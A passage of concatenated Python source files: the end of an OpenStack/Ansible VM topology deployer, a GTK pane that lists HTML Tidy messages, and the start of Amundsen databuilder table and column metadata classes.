if self.static:
raise RuntimeError("Not allowed to delete static VM")
if not self.vm:
return
self.checkReady = False
# delete ports for vips
if len(self.vips) > 0 and self.floating_ips > 0:
for vip in self.vips:
portId = self.getPortId(vip)
if portId != None:
self.neutron.delete_port(portId)
# Get attached volumes
l = []
for v in self.vm._info['os-extended-volumes:volumes_attached']:
l.append(v["id"])
self.nova.servers.delete(self.vm)
# Destroy attached volumes
for v in l:
while len(self.cinder.volumes.get(v)._info["attachments"]):
time.sleep(1)
self.cinder.volumes.delete(v)
def create(self):
if self.static:
raise RuntimeError("Not allowed to create static VM")
self.checkReady = True
block_device_mapping = {}
if len(self.volumes):
letter = ord('b')
for vol in self.volumes:
v = self.cinder.volumes.create(display_name=vol.name, size=vol.size)
block_device_mapping["/dev/vd%c"%chr(letter)] = "%s:::0"%v.id
letter= letter + 1
# Wait for creation
created = False
while not created:
v = self.cinder.volumes.get(v.id)
#print v.status
if v.status == "available":
created = True
time.sleep(1)
flavor = self.nova.flavors.find(name=self.flavor)
nics = []
for network in self.networks:
net = self.nova.networks.find(label=network)
nics.append({'net-id': net.id})
img = self.nova.images.find(name=self.image)
self.nova.servers.create(self.name, img, flavor, nics=nics, key_name = self.ssh_key_name, block_device_mapping=block_device_mapping)
def whenReady(self):
if self.static:
raise RuntimeError("Not allowed to update static VM")
self.associateFloatingIP()
self.setSecurityGroups()
self.cmdExe.command("ssh-keygen -R " + self.getIPAddress())
name = self.name.split("-")
vmType = name[1]
#vip management
i = 0
if len(self.vips) > 0:
# create port
for vip in self.vips:
if self.getPortId(vip) == None:
self.createPortForVip(i, vip)
i = i + 1
# ip associating
i = 0
for floatingip in self.floating_ips:
floatingipid = self.getFloatingIpId(floatingip)
vipPortId = self.getPortId(self.vips[i])
self.associateFloatingToPortVip(floatingipid, vipPortId)
i = i + 1
# update port
i = 0
for vip in self.vips:
body = {
"port": {
"allowed_address_pairs" : [{
"ip_address" : vip
}]
}
}
self.neutron.update_port(self.getPortId(self.getIPAddress(net=i)), body=body)
i = i + 1
def associateFloatingIP(self):
if len(self.vips) == 0 and len(self.floating_ips):
if not self.vm:
raise RuntimeError("Error: could not associate floating IP on not existing VM %s"%self.name)
cpt = 0
for floating_ip in self.floating_ips:
self.vm.add_floating_ip(floating_ip, self.getIPAddress(cpt))
cpt = cpt + 1
def associateFloatingToPortVip(self, floatingipId, portId):
body = {
"floatingip": {
"port_id" : portId
}
}
self.neutron.update_floatingip(floatingipId, body=body)
def setSecurityGroups(self):
if len(self.additional_security_groups):
if not self.vm:
raise RuntimeError("Error: could not set security groups on not existing VM %s"%self.name)
for sec in self.additional_security_groups:
self.vm.add_security_group(sec)
def createPortForVip(self,id, ip):
securityGroupsIds = []
for sec in self.additional_security_groups:
group_id = self.getSecurityGroupId(sec)
if group_id is None:
raise RuntimeError("Error: could not find the security group id for %s"%sec)
securityGroupsIds.append(str(group_id))
body = {
"port":
{
"admin_state_up": True,
"name": "vip" + str(id),
"network_id": self.getNetworkId(self.networks[id]),
"fixed_ips" :
[{
"ip_address" : ip
}],
"security_groups" : securityGroupsIds
}
}
self.neutron.create_port(body=body)
class PlaybookEvents:
def onPlaybookUpdated(self, playbook):
pass
def onPlaybookCompleted(self, playbook):
pass
def onPlaybookError(self, playbook):
pass
class Playbook:
def __init__(self, name, path, dependencies, env, ssh_user, ssh_key, inventory_file, cmdExe, verbose, static):
self.name = name
self.path = path
self.dependencies = dependencies
self.env = env
self.instances = []
self.ssh_key = ssh_key
self.ssh_user = ssh_user
self.inventory_file = inventory_file
self.cmdExe = cmdExe
self.verbose = ""
if verbose:
self.verbose = "-vvvv"
self.depPriority = 0
self.process = None
self.console_output=""
self.callbacks = []
self.status = "Not played"
if static:
self.status = "Not playable"
self.current_task = 0
def prepare(self):
if self.status == "Not playable":
raise RuntimeError("Not allowed to play %s"%self.name)
self.current_task = 0
self.tasks = []
playbook_cb = callbacks.PlaybookCallbacks(verbose=utils.VERBOSITY)
stats = callbacks.AggregateStats()
runner_cb = callbacks.PlaybookRunnerCallbacks(stats, verbose=utils.VERBOSITY)
pb = ansible.playbook.PlayBook(playbook=self.path, inventory=ansible.inventory.Inventory(self.inventory_file), remote_user=self.ssh_user, callbacks=playbook_cb, runner_callbacks=runner_cb, stats=stats, sudo="1", extra_vars={"env": self.env})
for (play_ds, play_basedir) in zip(pb.playbook, pb.play_basedirs):
play = ansible.playbook.Play(pb, play_ds, play_basedir,vault_password=pb.vault_password)
label = play.name
for task in play.tasks():
if (set(task.tags).intersection(pb.only_tags) and not set(task.tags).intersection(pb.skip_tags)):
if getattr(task, 'name', None) is not None:
self.tasks.append(task.name)
self.status = "Not played"
self.priority = self.depPriority + len(self.tasks)
def play(self):
if self.status == "Not playable":
raise RuntimeError("Not allowed to play %s"%self.name)
self.status = "Running"
# Start sub process
self.process = self.cmdExe.command("ansible-playbook %s --sudo --user=%s --private-key=%s --extra-vars=env=%s --inventory-file=%s %s"%(self.verbose, self.ssh_user, self.ssh_key.replace(" ", "\ "), self.env, self.inventory_file.replace(" ", "\ "), self.path.replace(" ", "\ ")), True, environment={"ANSIBLE_HOST_KEY_CHECKING": "False", "PYTHONUNBUFFERED": "True"})
t = Thread(target=self.processOutput)
t.start()
def terminate(self):
self.process.terminate()
def processOutput(self):
for line in iter(self.process.stdout.readline,''):
# Keep output in case of error
self.console_output = self.console_output + line
if line.startswith("TASK: "):
self.current_task = self.current_task + 1
for c in self.callbacks:
c.onPlaybookUpdated(self)
while self.cmdExe.isRunning(self.process):
time.sleep(1)
if self.process.returncode == 0:
self.status = "Completed"
for c in self.callbacks:
c.onPlaybookCompleted(self)
else:
self.status = "Error"
for c in self.callbacks:
c.onPlaybookError(self)
class TopologyEvents:
# Provisioning events
def onPlaybookAdded(self, playbook):
pass
def onPlaybookRemoved(self, playbook):
pass
def onInstanceAdded(self, instance):
pass
def onInstanceRemoved(self, instance):
pass
# Topology related events
def onStarted(self):
pass
# Instance related events
def onRedeployStarted(self):
pass
def onInstanceDeleted(self, instance):
pass
def onInstanceCreated(self, instance):
pass
def onInstanceActive(self, instance):
pass
def onInstanceReady(self, instance):
pass
def onAllInstancesReady(self):
pass
# Inventory related event
def onInventoryGenerated(self):
pass
# Playbook related events
def onAllPlaybooksStarted(self):
pass
def onPlaybookUpdated(self, playbook):
pass
def onPlaybookCompleted(self, playbook):
pass
def onAllPlaybooksCompleted(self):
pass
def onPlaybookError(self, playbook):
pass
class Topology(PlaybookEvents, InstanceEvents):
def __init__(self, topofile, verbose):
self.instances = []
self.playbooks = []
# Open topology file
with open(topofile, "r") as f:
topology = yaml.load(f)[0]
self.topo_directory = os.path.join(os.path.abspath(os.path.dirname(topofile)))
# Parse topology
# Generic values
self.env = topology["globals"]["env"]
self.ssh_key = os.path.join(self.topo_directory, topology["globals"]["ssh_key"])
self.ssh_user = topology["globals"]["ssh_user"]
self.ansible_inventory_template = os.path.join(self.topo_directory, topology["globals"]["ansible_inventory_template"])
self.inventory_file = os.path.join(os.path.abspath(os.path.dirname(self.ansible_inventory_template)), self.env)
self.cmdExe = CommandExecutor(verbose)
# Open stack variables
os_user = topology["globals"]["os_user"]
os_passwd = topology["globals"]["os_passwd"]
os_tenant = topology["globals"]["os_tenant"]
os_auth_url = topology["globals"]["os_auth_url"]
os_image = topology["globals"]["os_image"]
os_network = topology["globals"]["os_network"]
os_ssh_key = topology["globals"]["os_ssh_key"]
self.nova = novaclient.client.Client(2, os_user, os_passwd, os_tenant, os_auth_url)
cinder = cinderclient.client.Client('1', os_user, os_passwd, os_tenant, os_auth_url)
neutron = neutronClient.Client(username=os_user, password=os_passwd, tenant_name=os_tenant, auth_url=os_auth_url)
# Nodes to initiate
for i in topology["nodes"]:
node = i["node"]
name = node["name"]
playbook = None
if "playbook" in node:
playbook = node["playbook"]
flavor = None
if "flavor" in node:
flavor = node["flavor"]
ansible_config_keys = []
if "ansible_config_keys" in node:
ansible_config_keys = [x.strip() for x in node["ansible_config_keys"].split(",")]
volumes = []
if "volumes" in node:
for v in node["volumes"]:
volumes.append(Volume(v["name"], int(v["size"])))
floating_ips = []
if "floating_ips" in node:
floating_ips = [x.strip() for x in node["floating_ips"].split(",")]
vips = []
if "vips" in node:
vips = [x.strip() for x in node["vips"].split(",")]
additional_security_groups = []
if "security" in node:
additional_security_groups = [x.strip() for x in node["security"].split(",")]
dependencies = []
if "depends" in node:
dependencies = [x.strip() for x in node["depends"].split(",")]
networks = [os_network]
if "additional_network" in node:
networks.extend([x.strip() for x in node["additional_network"].split(",")])
static = False
if not playbook or "static" in node:
static = True
groups = []
if "groups" in node:
groups = [x.strip() for x in node["groups"].split(",")]
instance = Instance(name, flavor, ansible_config_keys, playbook, volumes, floating_ips, vips, additional_security_groups, dependencies, self.nova, cinder, neutron, os_image, networks, os_ssh_key, self.ssh_user, self.ssh_key, self.cmdExe, static, groups)
instance.callbacks.append(self)
self.instances.append(instance)
f.close()
# Compute playbooks
self.ansible_playbooks_directory = os.path.join(self.topo_directory, topology["globals"]["ansible_playbooks_directory"])
for instance in self.instances:
if instance.playbook_file:
pb = self.findPlaybook(instance.playbook_file)
if pb:
pb.instances.append(instance)
for dep in instance.dependencies:
if not dep in pb.dependencies:
pb.dependencies.append(dep)
else:
path = os.path.join(self.ansible_playbooks_directory, instance.playbook_file)
if not path.endswith(".yml"):
path = path + ".yml"
if not os.path.isfile(path):
raise NameError("Playbook %s does not exist! (no file %s)"%(instance.playbook_file, path))
pb = Playbook(instance.playbook_file, path, instance.dependencies, self.env, self.ssh_user, self.ssh_key, self.inventory_file, self.cmdExe, verbose, instance.static)
pb.instances.append(instance)
pb.callbacks.append(self)
self.playbooks.append(pb)
# Check dependencies and compute a priority for each
for pb in self.playbooks:
for dep in pb.dependencies:
p = self.findPlaybook(dep)
if p:
p.depPriority = p.depPriority + 100
else:
raise NameError("Dependency %s not defined in %s"%(dep, topofile))
self.callbacks = []
# To search playbooks/instances with a name
self.instances_by_name = {}
self.playbooks_by_name = {}
for i in self.instances:
if i.name in self.instances_by_name or i.name in self.playbooks_by_name:
raise NameError("Two instances with name %s"%i.name)
self.instances_by_name[i.name] = [i]
self.playbooks_by_name[i.name] = [self.findPlaybook(i.playbook_file)]
for p in self.playbooks:
if p.name in self.instances_by_name or p.name in self.playbooks_by_name:
raise NameError("Playbook name %s with other playbook or instance"%p.name)
self.instances_by_name[p.name] = p.instances
self.playbooks_by_name[p.name] = [p]
for i in self.instances:
for g in i.groups:
if g in self.instances_by_name or g in self.playbooks_by_name:
raise NameError("Group name %s conflicts with playbook or instance"%g)
for i in self.instances:
for g in i.groups:
if not g in self.instances_by_name:
self.instances_by_name[g] = [i]
else:
self.instances_by_name[g].append(i)
p = self.findPlaybook(i.playbook_file)
if not g in self.playbooks_by_name:
self.playbooks_by_name[g] = [p]
elif not p in self.playbooks_by_name[g]:
self.playbooks_by_name[g].append(p)
self.playbooks_to_play = []
self.instances_to_redeploy = []
self.is_running = False
self.refreshInstances()
self.refreshTime = 20
t = Thread(target=self.refreshInstancesThread)
t.setDaemon(True)
t.start()
def refreshInstancesThread(self):
while True:
time.sleep(self.refreshTime)
try:
self.refreshInstances()
except:
print "ERROR REFRESHING INSTANCES STATE"
print "Unexpected error:", sys.exc_info()[0]
def refreshInstances(self):
remainingTopoVMs = list(self.instances)
vms = self.nova.servers.list()
for vm in vms:
instance = self.findInstance(vm.name)
if instance:
instance.updateVM(vm)
if not instance in remainingTopoVMs:
raise RuntimeError("Duplicated VM with name %s"%instance.name)
remainingTopoVMs.remove(instance)
# Handle deleted VMs
for i in remainingTopoVMs:
i.updateVM(None)
def onVMCreated(self, instance):
for c in self.callbacks:
c.onInstanceCreated(instance)
def onVMActive(self, instance):
for c in self.callbacks:
c.onInstanceActive(instance)
def onVMReady(self, instance):
for c in self.callbacks:
c.onInstanceReady(instance)
if self.is_running and instance in self.instances_to_redeploy:
instance.whenReady()
self.instances_ready.append(instance)
if len(self.instances_ready) == len(self.instances_to_redeploy):
#Reset refresh timer
self.refreshTime = 20
for c in self.callbacks:
c.onAllInstancesReady()
self.startPlaybooks()
def onVMDeleted(self, instance):
for c in self.callbacks:
c.onInstanceDeleted(instance)
if self.is_running and instance in self.instances_to_redeploy:
# sleep 5 seconds before recreating the VM to workaroud a neutron-dhcp-agent issue (DHCP not able to assign the IP if the VM is created directly after been deleted...)
time.sleep(5)
instance.create()
def startRedeployInstances(self):
for c in self.callbacks:
c.onRedeployStarted()
self.instances_ready = []
# Refresh time about status of VM
self.refreshTime = 1
for instance in self.instances_to_redeploy:
# Do not create/delete static instances
if not instance.static:
if instance.vm:
instance.delete()
else:
instance.create()
def findInstance(self, name):
for i in self.instances:
if i.name == name:
return i
return None
def generateAnsibleInventory(self):
# Load template file
conf = ConfigParser.RawConfigParser(allow_no_value=True)
conf.read(os.path.join(self.ansible_inventory_template))
# Add IPs in ansible configuration file
for instance in self.instances:
for section in instance.ansible_sections:
ip = instance.getIPAddress()
if ip == None:
raise RuntimeError("Could not generate inventory because \"%s\" not found (no IP, is it started ?)"%instance.name)
host = ip + " name=" + instance.name
if len(instance.floating_ips):
host = host + " public=" + instance.floating_ips[0]
conf.set(section, host, None)
f = open(self.inventory_file, "w")
conf.write(f)
f.close()
for c in self.callbacks:
c.onInventoryGenerated()
def findPlaybook(self, name):
for p in self.playbooks:
if p.name == name:
return p
return None
def playNextPlaybooks(self):
candidates = []
cpt_running = 0
for pb in self.playbooks_to_play:
if pb.status == "Not played":
# Check dependencies
all_dep_ok = True
for d in pb.dependencies:
pbDep = self.findPlaybook(d)
if pbDep in self.playbooks_to_play and pbDep.status != "Completed":
all_dep_ok = False
if all_dep_ok:
candidates.append(pb)
elif pb.status == "Running":
cpt_running = cpt_running + 1
# Takes candidate with higher priority
def getPriority(pb):
return pb.priority
ordered_candidates = sorted(candidates, key=getPriority, reverse=True)
if len(ordered_candidates):
# Limit number of parallel playbooks
nb = min(len(ordered_candidates), 10-cpt_running)
for pb in ordered_candidates[:nb]:
pb.play()
def onPlaybookUpdated(self, playbook):
for c in self.callbacks:
c.onPlaybookUpdated(playbook)
def onPlaybookCompleted(self, playbook):
for c in self.callbacks:
c.onPlaybookCompleted(playbook)
self.completed_playbooks.append(playbook)
if len(self.completed_playbooks) == len(self.playbooks_to_play):
self.is_running = False
for c in self.callbacks:
c.onAllPlaybooksCompleted()
else:
self.playNextPlaybooks()
def onPlaybookError(self, playbook):
self.is_running = False
for pb in self.playbooks_to_play:
if pb.status == "Running":
pb.terminate()
for c in self.callbacks:
c.onPlaybookError(playbook)
def startPlaybooks(self):
self.generateAnsibleInventory()
# Prepare playbooks to play
for pb in self.playbooks_to_play:
pb.prepare()
for c in self.callbacks:
c.onAllPlaybooksStarted()
self.end = False
self.counter = 0
self.completed_playbooks = []
# Launch playbooks
self.playNextPlaybooks()
def addToRedeploy(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.instances_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for i in self.instances_by_name[name]:
if not i in self.instances_to_redeploy and not i.static:
self.instances_to_redeploy.append(i)
for c in self.callbacks:
c.onInstanceAdded(i)
self.addToReconfigure(i.name)
def removeToRedeploy(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.instances_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for i in self.instances_by_name[name]:
if i in self.instances_to_redeploy:
self.instances_to_redeploy.remove(i)
for c in self.callbacks:
c.onInstanceRemoved(i)
def addToReconfigure(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.playbooks_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for p in self.playbooks_by_name[name]:
if not p in self.playbooks_to_play and p.status != "Not playable":
self.playbooks_to_play.append(p)
for c in self.callbacks:
c.onPlaybookAdded(p)
def removeToReconfigure(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.playbooks_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for p in self.playbooks_by_name[name]:
if p in self.playbooks_to_play:
self.playbooks_to_play.remove(p)
for c in self.callbacks:
c.onPlaybookRemoved(p)
self.removeToRedeploy(p.name)
def run(self):
if self.is_running:
raise RuntimeError("Could not run because already running")
if len(self.instances_to_redeploy) or len(self.playbooks_to_play):
self.is_running = True
for c in self.callbacks:
c.onStarted()
if len(self.instances_to_redeploy):
self.startRedeployInstances()
else:
self.startPlaybooks()
|
py | 7dfacb0ea1c451ffd0cae948615749d53d5d2b96 | # Copyright (C) 2007 Ami Tavory ([email protected])
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307, USA.
"""
Output pane for displaying Tidy's output.
"""
import unittest
import pygtk
pygtk.require('2.0')
import gtk
import pango
import sys, string
import log_utils
import tidy_utils
def _make_column(title, num, markup, allow_sort):
renderer = gtk.CellRendererText()
column = gtk.TreeViewColumn(title, renderer)
if markup:
column.add_attribute(renderer, 'markup', num)
else:
column.add_attribute(renderer, 'text', num)
if allow_sort:
column.set_sort_column_id(num)
return column
def _type_to_color(type_):
assert tidy_utils.is_valid_type(type_)
if type_ == 'Error':
return 'red'
elif type_ == 'Warning':
return 'orange'
elif type_ == 'Config':
return 'purple'
else:
return 'black'
def _color_span(color, s):
return '<span foreground = "%s">%s</span>' %(color, s)
def _cond_visible(n):
if n != None:
return n
return ''
def _str_to_int(s):
if s == '':
return None
return int(s)
def _make_str_int_cmp(num):
def str_int_cmp(model, it0, it1):
lhs = _str_to_int( model.get_value(it0, num) )
rhs = _str_to_int( model.get_value(it1, num) )
if lhs == None and rhs == None:
return 0
if lhs == None:
return -1
if rhs == None:
return 1
if lhs < rhs:
return -1
if lhs == rhs:
return 0
return 1
return str_int_cmp
class _output_box(gtk.TreeView):
def __init__(self, on_activated):
self._list_store = gtk.ListStore(str, str, str, str)
super(_output_box, self).__init__(self._list_store)
self.append_column(_make_column('Line', 0, False, True))
self._list_store.set_sort_func(0, _make_str_int_cmp(0))
self.append_column(_make_column('Column', 1, False, False))
self._list_store.set_sort_func(1, _make_str_int_cmp(1))
self.append_column(_make_column('Type', 2, True, True))
self.append_column(_make_column('Message', 3, False, True))
self.set_headers_clickable(True)
self._on_activated = on_activated
self.connect("row-activated", self._on_row_activated)
def append(self, line, col, type_, what):
log_utils.debug('adding %s %s %s %s to output box' %(line, col, type_, what))
color = _type_to_color(type_)
log_utils.debug('adding %s %s to output box' %(_color_span(color, type_), what))
self._list_store.append([_cond_visible(line), _cond_visible(col), _color_span(color, type_), what])
log_utils.debug('added to output box')
def clear(self):
log_utils.debug('clearing output box')
self._list_store.clear()
log_utils.debug('cleared output box')
def _on_row_activated(self, view, row, column):
assert self == view
model = view.get_model()
iter = model.get_iter(row)
line = _str_to_int( model.get_value(iter, 0) )
col = _str_to_int( model.get_value(iter, 1) )
type_ = model.get_value(iter, 2)
what = model.get_value(iter, 3)
self._on_activated(line, col, type_, what)
class output_pane(gtk.ScrolledWindow):
"""
Output pane for displaying Tidy's output.
"""
def __init__(self, on_activated):
"""
Keyword arguments:
on_activated -- Callback for when a row is activated.
"""
super(output_pane, self).__init__()
self.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC);
self.set_shadow_type(gtk.SHADOW_IN)
self._box = _output_box(on_activated)
self.add_with_viewport(self._box)
self._box.show()
self.target_uri = None
def append(self, line, col, type_, what):
"""
Append another row.
"""
self._box.append(line, col, type_, what)
def clear(self):
"""
Clear all rows.
"""
self._box.clear()
self.target_uri = None
class test(unittest.TestCase):
def _print_activated(self, line, col, type_, what):
print line, col, type_, what
def test_output_pane_0(self):
o = output_pane(self._print_activated)
o.connect("destroy", gtk.main_quit)
main_wnd = gtk.Window(gtk.WINDOW_TOPLEVEL)
main_wnd.set_title('Output');
main_wnd.add(o)
o.target_uri = 'foo'
o.append(None, None, 'Info', 'Some info')
o.append(1, 2, 'Warning', 'Bad stuff!')
o.append(10, 2, 'Error', 'unknown tag <boo>')
o.append(1, 222, 'Warning', 'Also bad stuff!')
o.append(6, 2, 'Config', 'Just config stuff')
o.append(None, None, 'Config', 'Just config stuff with no line')
main_wnd.show_all()
gtk.main()
def suite():
return unittest.TestLoader().loadTestsFromTestCase(test)
if __name__ == '__main__':
unittest.main()
|
py | 7dfacb163f7eb3a4de8117658548867c22a7e141 | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import copy
from collections import namedtuple
from typing import Any, Dict, Iterable, Iterator, List, Optional, Set, Union
from databuilder.models.cluster import cluster_constants
from databuilder.models.neo4j_csv_serde import (
Neo4jCsvSerializable, NODE_LABEL, NODE_KEY, RELATION_START_KEY, RELATION_END_KEY, RELATION_START_LABEL,
RELATION_END_LABEL, RELATION_TYPE, RELATION_REVERSE_TYPE)
from databuilder.publisher.neo4j_csv_publisher import UNQUOTED_SUFFIX
from databuilder.models.schema import schema_constant
DESCRIPTION_NODE_LABEL_VAL = 'Description'
DESCRIPTION_NODE_LABEL = DESCRIPTION_NODE_LABEL_VAL
class TagMetadata(Neo4jCsvSerializable):
TAG_NODE_LABEL = 'Tag'
TAG_KEY_FORMAT = '{tag}'
TAG_TYPE = 'tag_type'
DEFAULT_TYPE = 'default'
BADGE_TYPE = 'badge'
DASHBOARD_TYPE = 'dashboard'
METRIC_TYPE = 'metric'
def __init__(self,
name: str,
tag_type: str = 'default',
):
self._name = name
self._tag_type = tag_type
self._nodes = iter([self.create_tag_node(self._name, self._tag_type)])
self._relations: Iterator[Dict[str, Any]] = iter([])
@staticmethod
def get_tag_key(name: str) -> str:
if not name:
return ''
return TagMetadata.TAG_KEY_FORMAT.format(tag=name)
@staticmethod
def create_tag_node(name: str,
tag_type: str =DEFAULT_TYPE
) -> Dict[str, str]:
return {NODE_LABEL: TagMetadata.TAG_NODE_LABEL,
NODE_KEY: TagMetadata.get_tag_key(name),
TagMetadata.TAG_TYPE: tag_type}
def create_next_node(self) -> Optional[Dict[str, Any]]:
# return the string representation of the data
try:
return next(self._nodes)
except StopIteration:
return None
def create_next_relation(self) -> Optional[Dict[str, Any]]:
# We don't emit any relations for Tag ingestion
try:
return next(self._relations)
except StopIteration:
return None
# TODO: this should inherit from ProgrammaticDescription in amundsen-common
class DescriptionMetadata:
DESCRIPTION_NODE_LABEL = DESCRIPTION_NODE_LABEL_VAL
PROGRAMMATIC_DESCRIPTION_NODE_LABEL = 'Programmatic_Description'
DESCRIPTION_KEY_FORMAT = '{description}'
DESCRIPTION_TEXT = 'description'
DESCRIPTION_SOURCE = 'description_source'
DESCRIPTION_RELATION_TYPE = 'DESCRIPTION'
INVERSE_DESCRIPTION_RELATION_TYPE = 'DESCRIPTION_OF'
# The default editable source.
DEFAULT_SOURCE = "description"
def __init__(self,
text: Optional[str],
source: str = DEFAULT_SOURCE
):
"""
:param source: The unique source of what is populating this description.
:param text: the description text. Markdown supported.
"""
self._source = source
self._text = text
# There are so many dependencies on Description node, that it is probably easier to just separate the rest out.
if (self._source == self.DEFAULT_SOURCE):
self._label = self.DESCRIPTION_NODE_LABEL
else:
self._label = self.PROGRAMMATIC_DESCRIPTION_NODE_LABEL
@staticmethod
def create_description_metadata(text: Union[None, str],
source: Optional[str] = DEFAULT_SOURCE
) -> Optional['DescriptionMetadata']:
# We do not want to create a node if there is no description text!
if text is None:
return None
if not source:
description_node = DescriptionMetadata(text=text, source=DescriptionMetadata.DEFAULT_SOURCE)
else:
description_node = DescriptionMetadata(text=text, source=source)
return description_node
def get_description_id(self) -> str:
if self._source == self.DEFAULT_SOURCE:
return "_description"
else:
return "_" + self._source + "_description"
def __repr__(self) -> str:
return 'DescriptionMetadata({!r}, {!r})'.format(self._source, self._text)
def get_node_dict(self,
node_key: str
) -> Dict[str, str]:
return {
NODE_LABEL: self._label,
NODE_KEY: node_key,
DescriptionMetadata.DESCRIPTION_SOURCE: self._source,
DescriptionMetadata.DESCRIPTION_TEXT: self._text or '',
}
def get_relation(self,
start_node: str,
start_key: str,
end_key: str
) -> Dict[str, str]:
return {
RELATION_START_LABEL: start_node,
RELATION_END_LABEL: self._label,
RELATION_START_KEY: start_key,
RELATION_END_KEY: end_key,
RELATION_TYPE: DescriptionMetadata.DESCRIPTION_RELATION_TYPE,
RELATION_REVERSE_TYPE: DescriptionMetadata.INVERSE_DESCRIPTION_RELATION_TYPE
}
class ColumnMetadata:
COLUMN_NODE_LABEL = 'Column'
COLUMN_KEY_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{col}'
COLUMN_NAME = 'name'
COLUMN_TYPE = 'type'
COLUMN_ORDER = 'sort_order{}'.format(UNQUOTED_SUFFIX) # int value needs to be unquoted when publish to neo4j
COLUMN_DESCRIPTION = 'description'
COLUMN_DESCRIPTION_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{col}/{description_id}'
# Relation between column and tag
COL_TAG_RELATION_TYPE = 'TAGGED_BY'
TAG_COL_RELATION_TYPE = 'TAG'
def __init__(self,
name: str,
description: Union[str, None],
col_type: str,
sort_order: int,
tags: Union[List[str], None] = None
) -> None:
"""
TODO: Add stats
:param name:
:param description:
:param col_type:
:param sort_order:
"""
self.name = name
self.description = DescriptionMetadata.create_description_metadata(source=None,
text=description)
self.type = col_type
self.sort_order = sort_order
self.tags = tags
def __repr__(self) -> str:
return 'ColumnMetadata({!r}, {!r}, {!r}, {!r})'.format(self.name,
self.description,
self.type,
self.sort_order)
# Tuples for de-dupe purpose on Database, Cluster, Schema. See TableMetadata docstring for more information
NodeTuple = namedtuple('KeyName', ['key', 'name', 'label'])
RelTuple = namedtuple('RelKeys', ['start_label', 'end_label', 'start_key', 'end_key', 'type', 'reverse_type'])
class TableMetadata(Neo4jCsvSerializable):
"""
Table metadata that contains columns. It implements Neo4jCsvSerializable so that it can be serialized to produce
Table, Column and relation of those along with relationship with table and schema. Additionally, it will create
Database, Cluster, and Schema with relastionships between those.
These are being created here as it does not make much sense to have different extraction to produce this. As
database, cluster, schema would be very repititive with low cardinality, it will perform de-dupe so that publisher
won't need to publish same nodes, relationships.
This class can be used for both table and view metadata. If it is a View, is_view=True should be passed in.
"""
TABLE_NODE_LABEL = 'Table'
TABLE_KEY_FORMAT = '{db}://{cluster}.{schema}/{tbl}'
TABLE_NAME = 'name'
IS_VIEW = 'is_view{}'.format(UNQUOTED_SUFFIX) # bool value needs to be unquoted when publish to neo4j
TABLE_DESCRIPTION_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{description_id}'
DATABASE_NODE_LABEL = 'Database'
DATABASE_KEY_FORMAT = 'database://{db}'
DATABASE_CLUSTER_RELATION_TYPE = cluster_constants.CLUSTER_RELATION_TYPE
CLUSTER_DATABASE_RELATION_TYPE = cluster_constants.CLUSTER_REVERSE_RELATION_TYPE
CLUSTER_NODE_LABEL = cluster_constants.CLUSTER_NODE_LABEL
CLUSTER_KEY_FORMAT = '{db}://{cluster}'
CLUSTER_SCHEMA_RELATION_TYPE = schema_constant.SCHEMA_RELATION_TYPE
SCHEMA_CLUSTER_RELATION_TYPE = schema_constant.SCHEMA_REVERSE_RELATION_TYPE
SCHEMA_NODE_LABEL = schema_constant.SCHEMA_NODE_LABEL
SCHEMA_KEY_FORMAT = schema_constant.DATABASE_SCHEMA_KEY_FORMAT
SCHEMA_TABLE_RELATION_TYPE = 'TABLE'
TABLE_SCHEMA_RELATION_TYPE = 'TABLE_OF'
TABLE_COL_RELATION_TYPE = 'COLUMN'
COL_TABLE_RELATION_TYPE = 'COLUMN_OF'
TABLE_TAG_RELATION_TYPE = 'TAGGED_BY'
TAG_TABLE_RELATION_TYPE = 'TAG'
# Only for deduping database, cluster, and schema (table and column will be always processed)
serialized_nodes: Set[Any] = set()
serialized_rels: Set[Any] = set()
def __init__(self,
database: str,
cluster: str,
schema: str,
name: str,
description: Union[str, None],
columns: Iterable[ColumnMetadata] = None,
is_view: bool = False,
tags: Union[List, str] = None,
description_source: Union[str, None] = None,
**kwargs: Any
) -> None:
"""
:param database:
:param cluster:
:param schema:
:param name:
:param description:
:param columns:
:param is_view: Indicate whether the table is a view or not
:param tags:
:param description_source: Optional. Where the description is coming from. Used to compose unique id.
:param kwargs: Put additional attributes to the table model if there is any.
"""
self.database = database
self.cluster = cluster
self.schema = schema
self.name = name
self.description = DescriptionMetadata.create_description_metadata(text=description, source=description_source)
self.columns = columns if columns else []
self.is_view = is_view
self.attrs: Optional[Dict[str, Any]] = None
self.tags = TableMetadata.format_tags(tags)
if kwargs:
self.attrs = copy.deepcopy(kwargs)
self._node_iterator = self._create_next_node()
self._relation_iterator = self._create_next_relation()
def __repr__(self) -> str:
return 'TableMetadata({!r}, {!r}, {!r}, {!r} ' \
'{!r}, {!r}, {!r}, {!r})'.format(self.database,
self.cluster,
self.schema,
self.name,
self.description,
self.columns,
self.is_view,
self.tags)
def _get_table_key(self) -> str:
return TableMetadata.TABLE_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name)
def _get_table_description_key(self,
description: DescriptionMetadata) -> str:
return TableMetadata.TABLE_DESCRIPTION_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
description_id=description.get_description_id())
def _get_database_key(self) -> str:
return TableMetadata.DATABASE_KEY_FORMAT.format(db=self.database)
def _get_cluster_key(self) -> str:
